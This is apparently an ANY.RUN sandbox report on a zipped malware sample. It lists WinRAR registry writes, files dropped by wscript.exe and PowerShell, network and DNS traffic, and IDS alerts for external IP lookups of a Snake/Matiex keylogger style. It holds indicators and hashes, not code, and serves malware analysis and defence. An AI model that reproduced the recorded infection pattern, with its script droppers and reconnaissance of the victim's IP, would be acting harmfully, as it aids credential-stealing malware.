c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
8456"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\4e5de3dba8ee1e3ea841feb67b4a6350a6796f019c20859939a8c8be0d33402d.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
15 007
Read events
14 995
Write events
12
Delete events
0

Modification events

(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Downloads\chromium_build 1.zip
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\4e5de3dba8ee1e3ea841feb67b4a6350a6796f019c20859939a8c8be0d33402d.zip
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(8456) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
Executable files
0
Suspicious files
1
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
6020wscript.exeC:\Users\Public\Mands.pngtext
MD5:62DA9FB7DAABAE46E3D37C16B34D8588
SHA256:3638971EA743E157E4F3CD05F91055D26721AC2769E352D8E16EBA41D15514D8
2788powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5cghunip.rlc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2788powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cfrhuivv.ror.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6020wscript.exeC:\Users\Public\Vile.pngtext
MD5:5BC5BB8CE8D536C3351963942ED30E33
SHA256:3F5F3931276CD40AD23525167632E4FAE310AA3C9BDB8B4F735DBD0800D3ABC7
2788powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:C657B13234B1F96F854617A050F69CA0
SHA256:6CA8731008A09A8B01A1AF8A3CD629D52E6CBDB981BE79557DA991A1FE1E6773
2788powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y4qn1ym2.gss.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2788powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xelqokyh.fer.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
84
TCP/UDP connections
55
DNS requests
23
Threats
29

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4936
RUXIMICS.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/RUXIM?os=Windows&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3623&OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&FlightRing=Retail&AttrDataVer=186&App=RUXIM&AppVer=&DeviceFamily=Windows.Desktop
US
whitelisted
6768
MoUsoCoreWorker.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
whitelisted
6768
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
4936
RUXIMICS.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
4936
RUXIMICS.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
6320
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
6768
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
6320
svchost.exe
GET
200
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaasMedic?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&appVer=10.0.19041.3758&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4
US
text
3.41 Kb
whitelisted
6320
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
POST
200
20.190.159.2:443
https://login.live.com/RST2.srf
US
binary
11.1 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
6320
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4936
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2.16.241.207:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
4936
RUXIMICS.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6768
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6320
svchost.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
self.events.data.microsoft.com
  • 52.168.117.169
  • 20.189.173.25
whitelisted
www.bing.com
  • 2.16.241.207
  • 2.16.241.202
  • 2.16.241.209
  • 2.16.241.198
  • 2.16.241.205
  • 2.16.241.200
  • 2.16.241.206
  • 2.16.241.208
  • 2.16.241.226
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
google.com
  • 142.251.143.110
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
www.microsoft.com
  • 88.221.169.152
  • 23.52.181.212
whitelisted
login.live.com
  • 40.126.31.71
  • 20.190.159.0
  • 40.126.31.69
  • 20.190.159.128
  • 20.190.159.64
  • 40.126.31.128
  • 20.190.159.130
  • 20.190.159.75
whitelisted
checkip.dyndns.org
  • 193.122.130.0
  • 193.122.6.168
  • 158.101.44.242
  • 132.226.247.73
  • 132.226.8.169
whitelisted
reallyfreegeoip.org
  • 188.114.97.3
  • 188.114.96.3
shared

Threats

PID
Process
Class
Message
4936
RUXIMICS.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2292
svchost.exe
Device Retrieving External IP Address Detected
ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
2788
powershell.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
2292
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
2788
powershell.exe
Misc activity
ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
2788
powershell.exe
Device Retrieving External IP Address Detected
ET INFO 404/Snake/Matiex Keylogger Style External IP Check
2292
svchost.exe
Misc activity
ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
2788
powershell.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
2788
powershell.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
2788
powershell.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
4e5de3dba8ee1e3ea841feb67b4a6350a6796f019c20859939a8c8be0d33402d.zip